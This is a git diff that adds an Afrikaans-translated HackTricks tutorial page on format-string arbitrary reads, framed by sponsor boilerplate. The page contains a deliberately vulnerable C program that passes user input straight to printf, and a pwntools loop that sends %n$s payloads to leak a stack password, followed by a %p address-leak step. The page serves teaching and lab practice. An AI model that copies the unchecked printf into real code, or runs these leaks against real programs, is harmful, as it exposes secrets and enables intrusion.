diff --git a/.gitbook/assets/image (1225).png b/.gitbook/assets/image (1225).png
new file mode 100644
index 000000000..b0a1f83a4
Binary files /dev/null and b/.gitbook/assets/image (1225).png differ
diff --git a/.gitbook/assets/image (1226).png b/.gitbook/assets/image (1226).png
new file mode 100644
index 000000000..66c23406f
Binary files /dev/null and b/.gitbook/assets/image (1226).png differ
diff --git a/.gitbook/assets/image (1227).png b/.gitbook/assets/image (1227).png
new file mode 100644
index 000000000..47298f9e6
Binary files /dev/null and b/.gitbook/assets/image (1227).png differ
diff --git a/.gitbook/assets/image (1228).png b/.gitbook/assets/image (1228).png
new file mode 100644
index 000000000..2cb50f892
Binary files /dev/null and b/.gitbook/assets/image (1228).png differ
diff --git a/.gitbook/assets/image (1229).png b/.gitbook/assets/image (1229).png
new file mode 100644
index 000000000..ffbd0b31e
Binary files /dev/null and b/.gitbook/assets/image (1229).png differ
diff --git a/.gitbook/assets/image (1230).png b/.gitbook/assets/image (1230).png
new file mode 100644
index 000000000..49c6c459e
Binary files /dev/null and b/.gitbook/assets/image (1230).png differ
diff --git a/.gitbook/assets/image (1231).png b/.gitbook/assets/image (1231).png
new file mode 100644
index 000000000..545fcdfaf
Binary files /dev/null and b/.gitbook/assets/image (1231).png differ
diff --git a/.gitbook/assets/image (1232).png b/.gitbook/assets/image (1232).png
new file mode 100644
index 000000000..a3ec7d605
Binary files /dev/null and b/.gitbook/assets/image (1232).png differ
diff --git a/.gitbook/assets/image (1233).png b/.gitbook/assets/image (1233).png
new file mode 100644
index 000000000..4d9c81fde
Binary files /dev/null and b/.gitbook/assets/image (1233).png differ
diff --git a/.gitbook/assets/image (1234).png b/.gitbook/assets/image (1234).png
new file mode 100644
index 000000000..21b3b1ba6
Binary files /dev/null and b/.gitbook/assets/image (1234).png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index 7edb398d4..1cc896174 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -715,6 +715,7 @@
* [Array Indexing](binary-exploitation/array-indexing.md)
* [Integer Overflow](binary-exploitation/integer-overflow.md)
* [Format Strings](binary-exploitation/format-strings/README.md)
+ * [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
* [Heap](binary-exploitation/heap/README.md)
* [Use After Free](binary-exploitation/heap/use-after-free.md)
diff --git a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
new file mode 100644
index 000000000..18869df84
--- /dev/null
+++ b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
@@ -0,0 +1,98 @@
+# Formaat Strings - Willekeurige Lees Voorbeeld
+
+
+
+Leer AWS hak vanaf nul tot held methtARTE (HackTricks AWS Red Team Expert)!
+
+Ander maniere om HackTricks te ondersteun:
+
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Deel jou haktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## Kode
+```c
+#include
+#include
+
+char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
+
+int main() {
+char stack_password[20] = "secretStackPass"; // Password in stack
+char input1[20], input2[20];
+
+printf("Enter first password: ");
+scanf("%19s", input1);
+
+printf("Enter second password: ");
+scanf("%19s", input2);
+
+// Vulnerable printf
+printf(input1);
+printf("\n");
+
+// Check both passwords
+if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
+printf("Access Granted.\n");
+} else {
+printf("Access Denied.\n");
+}
+
+return 0;
+}
+```
+Stel dit saam met:
+```bash
+clang -o fs-read fs-read.c -Wno-format-security
+```
+### Lees vanaf stak
+
+Die **`stack_password`** sal in die stak gestoor word omdat dit 'n plaaslike veranderlike is, dus is dit genoeg om printf te misbruik om die inhoud van die stak te wys. Dit is 'n aanval om die eerste 100 posisies te lek om die wagwoorde van die stak te onthul:
+```python
+from pwn import *
+
+for i in range(100):
+print(f"Try: {i}")
+payload = f"%{i}$s\na".encode()
+p = process("./fs-read")
+p.sendline(payload)
+output = p.clean()
+print(output)
+p.close()
+```
+In die beeld is dit moontlik om te sien dat ons die wagwoord van die stok in die `10de` posisie kan lek:
+
+
+
+
+
+Deur dieselfde aanval uit te voer, maar met `%p` in plaas van `%s`, is dit moontlik om 'n heap-adres van die stok te lek by `%5$p`:
+
+
+
+
+
+
+
+Die verskil tussen die gelekte adres en die adres van die wagwoord is:
+```
+> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
+$1 = 0x126a
+```
+
+
+Leer AWS-hacking vanaf nul tot held methtARTE (HackTricks AWS Red Team Expert)!
+
+Ander maniere om HackTricks te ondersteun:
+
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
+
+
.png)
.png)
.png)
.png)
.png)